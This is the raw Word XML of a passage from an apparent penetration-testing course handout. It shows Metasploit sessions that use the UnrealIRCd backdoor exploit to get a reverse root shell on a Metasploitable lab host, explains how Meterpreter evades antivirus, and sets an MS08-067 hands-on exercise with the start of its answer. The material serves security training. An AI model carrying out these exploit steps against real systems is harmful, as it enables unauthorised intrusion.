    <w:p w14:paraId="0C2E4933" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BACF37" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AC58D5" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Automatic Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8B3C8" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2975AF50" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D3579F" w14:textId="24FD28A0" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D53426" w14:textId="33E3F5EF" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LHOST =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E50ED" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B353A3" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C6F41" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D64DEAF" w14:textId="0AAD01C5" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP double handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BFEA1E" w14:textId="42672E9C" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:6667 - Connected to </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:6667...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A855531" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48221FE7" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602EB85C" w14:textId="7BFB0AF2" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:6667 - Sending backdoor command...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B637A49" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Accepted the first client connection...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FB2C1" w14:textId="77777777" w:rsidR="0064649B" w:rsidRPr="00B616D6" w:rsidRDefault="0064649B" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D43E658" w14:textId="6F2D2144" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Matching...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E89723" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] A is input...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FADE8A" w14:textId="6F5B2C5A" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Command shell session 1 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4444 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:55613) at 2018-06-26 16:56:36 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54381488" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0678970A" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B470C89" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB8BC8F" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D269D27" w14:textId="77777777" w:rsidR="00324ED4" w:rsidRDefault="00324ED4" w:rsidP="00324ED4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4AA9A4" w14:textId="4D2FCE53" w:rsidR="00AF45A2" w:rsidRDefault="00324ED4" w:rsidP="00095B04">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00095B04">
        <w:t>oot@metasploitable:/etc/unreal#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B421A3" w14:textId="77777777" w:rsidR="00875E35" w:rsidRDefault="00875E35" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3259A9" w14:textId="3F09C55B" w:rsidR="00875E35" w:rsidRDefault="00095B04" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter is a special payload that is used by attacker</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to obtain more control over the target machine. It is loaded in-memory and write nothing to disk so it does not trigger Anti-virus. Meterpreter injects itself into the compromised process and can migrate to other running process. No new processes are created</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00875E35">
        <w:t xml:space="preserve"> All of these provide limited forensic evidence</w:t>
      </w:r>
      <w:r w:rsidR="00FB2CC7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00875E35">
        <w:t xml:space="preserve"> on the victim machine. Features can be loaded at runtime over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696DD547" w14:textId="77777777" w:rsidR="00B616D6" w:rsidRDefault="00B616D6" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15825727" w14:textId="77777777" w:rsidR="00B616D6" w:rsidRDefault="00B616D6" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148886DB" w14:textId="482D8634" w:rsidR="00875E35" w:rsidRDefault="00875E35" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Because of the power Meterpreter gives to an attacker once on a machine, the goal in the future Hands </w:t>
      </w:r>
      <w:r w:rsidR="00A1069B">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>n will often be to get a Meterpreter session on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940ED21" w14:textId="0D94BB3F" w:rsidR="00656828" w:rsidRDefault="00656828" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC13DB" w14:textId="331FCE51" w:rsidR="00B46A74" w:rsidRDefault="00656828" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The machine </w:t>
      </w:r>
      <w:r w:rsidR="00B46A74">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="0064649B">
        <w:t>192.168.1.20</w:t>
      </w:r>
      <w:r w:rsidR="00B46A74">
        <w:t xml:space="preserve"> is not patched for the MS08_067 vulnerability. Exploit it and get </w:t>
      </w:r>
      <w:r w:rsidR="00011489">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00B46A74">
        <w:t>shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D45BFA" w14:textId="68C9F8F0" w:rsidR="009F6407" w:rsidRDefault="00656828" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HANDS ON </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ANSWERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C43564" w14:textId="03189367" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Look for the right exploit to use and display information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326FA985" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf &gt; search ms08_067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C712B6" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702576DA" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D85E0" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115D159" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0CF72F" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name                                 Disclosure Date  Rank   Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3573943A" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----                                 ---------------  ----   -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A4552" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1222DE" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D094CF" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E9B433" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf &gt; use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B2CAB1" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(windows/smb/ms08_067_netapi) &gt; info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716AAB0" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9EF93B" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC175E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     Module: exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA916D7" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Platform: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDDF798" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       Arch: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770529E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Privileged: Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E4D6B" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    License: Metasploit Framework License (BSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248CC96E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       Rank: Great</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48184658" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Disclosed: 2008-10-28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F7F73" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D944AF" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Provided by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342CA240" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  hdm &lt;x@hdm.io&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F593F54" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Brett Moore &lt;brett.moore@insomniasec.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF3756" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  frank2 &lt;frank2@dc949.org&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A8C19" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  jduck &lt;jduck@metasploit.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD7B36" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2CC88B" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Available targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40165523" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CCF4FC" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF3625" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D180A" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  1   Windows 2000 Universal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB9E59" w14:textId="77777777" w:rsidR="0064649B" w:rsidRPr="00B616D6" w:rsidRDefault="0064649B" w:rsidP="0064649B">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABEC510" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  7   Windows XP SP3 English (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB94FB" w14:textId="75833C61" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  8   Windows XP SP2 Arabic (NX)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B114E33" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D0EA80" w14:textId="31AFA9C9" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>SKIPPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072599A2" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRPr="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180493BF" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Basic options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A4B8AB" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D2708" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF0626" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  RHOST                     yes       The target address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFB98AA" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C9D8C" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4AF64" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71597D9F" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113524FD" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Space: 408</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED8CADD" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Avoid: 8 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB48AB" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664F8D6E" w14:textId="77777777" w:rsidR="00AF5FEA" w:rsidRDefault="00AF5FEA" w:rsidP="00AF5FEA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
